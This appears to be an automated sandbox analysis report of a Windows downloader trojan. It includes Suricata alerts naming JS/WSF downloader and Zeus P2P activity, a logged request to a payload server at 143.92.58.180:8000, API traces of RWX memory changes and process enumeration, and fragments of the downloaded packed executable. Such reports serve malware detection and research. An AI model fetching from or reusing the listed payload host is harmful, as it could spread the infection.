TCP 143.92.58.180:8000 -> 192.168.56.103:49599 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49277 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49599 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49277 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49277 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49599 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49782 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49531 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49531 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49782 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49531 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49782 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49531 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49782 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49531 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49782 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49531 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49782 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49531 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49782 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49724 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49724 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49724 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49724 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49724 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49724 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49724 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49722 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49722 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49722 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49722 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49722 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49722 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49722 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49786 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49786 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49786 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49786 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49786 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49786 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49786 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49672 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49672 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49672 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49672 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49672 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49672 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49672 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49593 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49593 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49593 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49593 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49593 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49593 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49593 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49455 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49455 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49455 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49455 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49455 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49455 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49455 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49186 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49186 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49186 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49186 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49186 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49186 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49186 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49498 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49498 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49498 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49498 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49498 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49498 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49498 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49460 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49460 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49460 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49460 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49460 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49460 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49460 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49236 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49236 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49236 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49236 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49236 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49236 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49236 2014520 ET INFO EXE - Served Attached HTTP Misc activity

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0
suspicious_features Connection to IP address suspicious_request GET http://143.92.58.180:8000/1
request GET http://143.92.58.180:8000/1
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 1648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x744dd000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x752e1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76e01000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75931000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74460000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x744f1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74101000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x740f1000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935757312
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935794176
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935745024
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935781888
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935728640
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935253504
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935716352
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935245312
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935699968
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935237120
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935683584
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935757312
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935671296
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935831040
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935302656
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935814656
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935822848
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935802368
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935810560
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935790080
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935798272
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935716352
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935847424
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935806464
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935872000
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935360000
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935855616
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935880192
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935843328
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935867904
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935831040
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935855616
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935818752
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935843328
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935806464
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935831040
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935794176
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935818752
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935781888
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935806464
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935769600
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935794176
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935757312
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935781888
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935220736
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935245312
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935208448
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935233024
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935196160
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9935220736
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0
file C:\Users\test22\AppData\Roaming\XsvnGpYsBj.exe
Time & API Arguments Status Return Repeated

Process32NextW

 snapshot_handle: 0x000000fc
process_name: mobsync.exe
process_identifier: 1800
1 1 0

Process32NextW

 snapshot_handle: 0x000000fc
process_name: rundll32.exe
process_identifier: 1648
1 1 0
Time & API Arguments Status Return Repeated

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 last-modified: Sat, 14 Oct 2023 15:45:59 GMT etag: "0:83670:652ab7b7:2c77226c" accept-ranges: bytes content-disposition: attachment; filename="1" content-type: application/octet-stream date: Wed, 18 Oct 2023 00:46:45 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 804
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 etag: "0:83670:652ab7b7:2c77226c" accept-ranges: bytes content-disposition: attachment; filename="1" content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT date: Wed, 18 Oct 2023 00:46:46 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 820
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 content-disposition: attachment; filename="1" accept-ranges: bytes content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT etag: "0:83670:652ab7b7:2c77226c" date: Wed, 18 Oct 2023 00:46:47 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 276
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 etag: "0:83670:652ab7b7:2c77226c" last-modified: Sat, 14 Oct 2023 15:45:59 GMT content-disposition: attachment; filename="1" content-type: application/octet-stream accept-ranges: bytes date: Wed, 18 Oct 2023 00:46:47 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 816
1 1024 0

recv

